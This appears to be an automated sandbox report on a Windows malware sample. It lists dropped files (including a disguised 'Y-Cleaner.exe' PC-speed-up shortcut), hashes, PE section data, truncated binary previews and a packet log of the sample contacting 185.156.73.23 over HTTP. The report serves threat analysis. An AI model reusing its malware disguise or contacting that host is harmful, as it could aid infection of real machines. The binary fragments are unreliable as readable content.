                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1502720
                                                  Entropy (8bit):7.646111739368707
                                                  Encrypted:false
                                                  SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                  MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                  SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                  SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                  SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                  Process:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 16:56:18 2024, mtime=Fri Dec 20 16:56:18 2024, atime=Fri Dec 20 16:56:18 2024, length=1502720, window=hide
                                                  Category:modified
                                                  Size (bytes):2110
                                                  Entropy (8bit):3.881014578275486
                                                  Encrypted:false
                                                  SSDEEP:48:8Knz92ETRYyUmCXGvNPwmFuwmIZXuwmSbmyg:8KzQEtYmlNPFsesry
                                                  MD5:6610D5020D63E2BF7CE71B107668062F
                                                  SHA1:D8C7D87F896F9B449FE8F80F55763A709442CA57
                                                  SHA-256:1854F683AE2AD0E509BCF10F55925D289029F143CFDF7812F682ADD8B3BEB81A
                                                  SHA-512:3CF9E413E02FBFCB45DE97A19F7EA587C4459D0E5904EB38885C442913C987825922583EB6E437D2FAAD88EB79D081D4FEA755D9F22C561E27256FB0EB8BA9C7
                                                  Malicious:false
                                                  Preview:L..................F.@.. ...^7lx.S..^7lx.S..^7lx.S.......................... .:..DG..Yr?.D..U..k0.&...&......Qg.*_...(..].R....ux.S......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y...........................3*N.A.p.p.D.a.t.a...B.P.1......Y....Local.<......EW.=.Y...........................k~..L.o.c.a.l.....N.1......Y....Temp..:......EW.=.Y................................T.e.m.p.....\.1......Y....WUBEWE~1..D......Y...Y.......&........................w.u.B.e.w.e.e.R.z.....h.2......Y.. .Y-CLEA~1.EXE..L......Y...Y.......'........................Y.-.C.l.e.a.n.e.r...e.x.e.......l...............-.......k.............Y......C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.-.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.u.B.e.w.e.e.R.z.\.Y.-.C.l.e.a.n.e.r...e.x.e.<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.u.B.e.w.e.e.R.z.\.Y.-.C.l.e.a.n.e.r...e.x.e.........%SystemD
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.416671854903513
                                                  Encrypted:false
                                                  SSDEEP:6144:Tcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNG5+:Ii58oSWIZBk2MM6AFBUo
                                                  MD5:4552149DF3748DF669650B805E7D4F3A
                                                  SHA1:D56AE0532C852CA80A71B955054608167B27BC43
                                                  SHA-256:EC09B3E717C0845F118130A8CAD13DF18475EA7EB7CB7F3C3A14664382EABCFC
                                                  SHA-512:81BD859DF71FD977FF87CBC1067BCFCB6CBFBEA9480AE211110F575B1C0B7EF55E3861F54FB4FA7EDB04530BB78F1B52C45C5A0778B0F0E9C3C37B48F51FB62B
                                                  Malicious:false
                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*Z.x.S.................................................................................................................................................................................................................................................................................................................................................L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.940690715452113
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:3K6rBUOQ2z.exe
                                                  File size:1'922'560 bytes
                                                  MD5:cd064ed63eb478d56c93d52cfe887dc8
                                                  SHA1:9d62f688f68fcd6e26dd305182aaa06b347cac19
                                                  SHA256:a324acc96508f28104aa5405783170e94920f75a4f07751583b97e18bb98deb2
                                                  SHA512:f77e50ada3ca7294f8a1f55c2bc2023c928e59f2bb7443468e7e739bce215b0b31373e4f247bc93394f5a7f400fdfcc6383b559c93210d6ab2b9c1a1b87e42bd
                                                  SSDEEP:49152:1ED7vTGcq2ulw6Mcb3AXB/ruhJgpBe0Gh46GCSdX4/:GD7rGcq2RvB/KMpc0GRi
                                                  TLSH:A395330FEA27622AC61A06F555632472F37CCA7B28D0939A51811F7C0DBA71F5D32F68
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...
                                                  Icon Hash:e7a99a8a8651790c
                                                  Entrypoint:0xc50000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                  Instruction
                                                  jmp 00007F7F915EC73Ah
                                                  sysenter
                                                  sbb eax, 00000000h
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [esi], al
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], dh
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add bh, bh
                                                  Programming Language:
                                                  • [C++] VS2008 build 21022
                                                  • [ASM] VS2008 build 21022
                                                  • [ C ] VS2008 build 21022
                                                  • [IMP] VS2005 build 50727
                                                  • [RES] VS2008 build 21022
                                                  • [LNK] VS2008 build 21022
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x41805b0x6f.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40d0000xaea0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x8480a80x18gvkzzqfv
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  0x10000x40c0000x24e00fc45d145d71ae0a9b0e8437caedf6f89unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x40d0000xaea00x7000e97bdce4861cf7ec847f60baa672ee20False0.9675641741071429data7.892982432090014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata 0x4180000x10000x200b8539b83d0b3f253ed2a56b71af0554bFalse0.154296875data1.085758102617974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  0x4190000x2900000x200d723a29fea81b119d8517fcb66e92c50unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  gvkzzqfv0x6a90000x1a60000x1a5e00a237ac72105a4437d5cd8de2573f9147False0.9899259259259259DOS executable (COM)7.94777914547085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  qtkkvrkg0x84f0000x10000x400a5b4c1f674fffda327a9926ef104627bFalse0.8154296875data6.376356615505464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .taggant0x8500000x30000x22008e36d504b9998b3160170d4063e1f1f4False0.09191176470588236DOS executable (COM)1.1192734606267767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x8481080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.7971748400852878
                                                  RT_ICON0x848fb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.7838447653429603
                                                  RT_ICON0x8498580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7200460829493087
                                                  RT_ICON0x849f200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.740606936416185
                                                  RT_ICON0x84a4880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.6840248962655602
                                                  RT_ICON0x84ca300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.7345215759849906
                                                  RT_ICON0x84dad80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.7622950819672131
                                                  RT_ICON0x84e4600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8111702127659575
                                                  RT_STRING0x413c800x330data0.8370098039215687
                                                  RT_STRING0x413fb00x170data0.15
                                                  RT_STRING0x4141200x620empty0
                                                  RT_STRING0x4147400x762empty0
                                                  RT_STRING0x414ea40x852empty0
                                                  RT_STRING0x4156f80x726empty0
                                                  RT_STRING0x415e200x658empty0
                                                  RT_STRING0x4164780x6c0empty0
                                                  RT_STRING0x416b380x638empty0
                                                  RT_STRING0x4171700x88aempty0
                                                  RT_ACCELERATOR0x4179fc0x20empty0
                                                  RT_GROUP_ICON0x84e8c80x76dataTurkmenTurkmenistan0.6610169491525424
                                                  RT_VERSION0x84e93e0x1b4data0.5711009174311926
                                                  RT_MANIFEST0x84eaf20x256ASCII text, with CRLF line terminators0.5100334448160535
                                                  DLLImport
                                                  kernel32.dlllstrcpy
                                                  Language of compilation systemCountry where language is spokenMap
                                                  TurkmenTurkmenistan
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 20, 2024 17:09:16.787842989 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:16.907385111 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:16.907494068 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:16.908464909 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:17.028074980 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:18.268279076 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:18.268568993 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:18.280402899 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:18.400141001 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:18.792028904 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:18.792387009 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:18.797880888 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:18.917572975 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368071079 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368096113 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368113995 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368136883 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.368163109 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.368232012 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368247032 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368263006 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368302107 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.368338108 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.368623972 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368644953 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.368675947 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.368695974 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.376415968 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.376521111 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.377154112 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.377206087 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.384824038 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.384845972 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.384932995 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.590934992 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.590955973 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.591011047 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.591058969 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.594790936 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.594814062 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.594898939 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.594898939 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.601205111 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.601227999 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.601250887 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.601289034 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.613226891 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.613248110 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.613274097 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.613289118 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.621231079 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.621253014 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.621285915 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.621316910 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.625207901 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.625226974 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.625252008 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.625267029 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.633229971 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.633249998 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.633280039 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.633308887 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.641237974 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.641262054 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.641294003 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.641319036 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.653027058 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.653057098 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.653089046 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.653119087 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.656491041 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.656514883 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.656539917 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.656569004 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.664453030 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.664475918 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.664499998 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.664530993 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.673250914 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.673278093 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.673312902 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.673343897 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.711045980 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.711112022 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.782306910 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.782326937 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.782480955 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.784034967 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.784049988 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.784096956 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.787817955 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.787887096 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.787903070 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.787946939 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.794637918 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.794689894 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.794744968 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.794771910 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.801012993 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.801105022 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.801156998 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.801198006 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.806982040 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.807054996 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.808171034 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.808248997 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.817253113 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.817275047 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.817328930 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.817358017 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.818881989 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.818960905 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.819678068 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.819725037 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.824850082 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.824904919 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.825002909 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.825047016 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.831451893 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.831470966 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.831528902 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.831553936 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.836905003 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.836925030 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.836973906 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.844218016 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.844238997 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.844279051 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.844326973 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.848434925 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.848491907 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.848810911 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.848859072 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.852205038 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.852224112 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.852257013 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.852278948 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.855742931 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.855838060 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.855875969 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.855916977 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.859530926 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.859554052 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.859595060 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.859623909 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.863075018 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.863097906 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.863132000 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.863151073 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.866255999 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.866305113 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.866337061 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.866360903 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.871645927 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.871669054 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.871707916 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.871733904 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.873997927 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.874017954 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.874053001 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.874077082 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.876693010 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.876775980 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.876823902 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.876863956 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.880296946 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.880316973 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.880362034 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.880393028 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.883529902 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.883599043 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.883738041 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:19.883886099 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:19.902302027 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:20.022028923 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:20.389518023 CET8049821185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:09:20.392384052 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:22.428076029 CET4982180192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:09:22.430617094 CET4983480192.168.2.7185.156.73.23
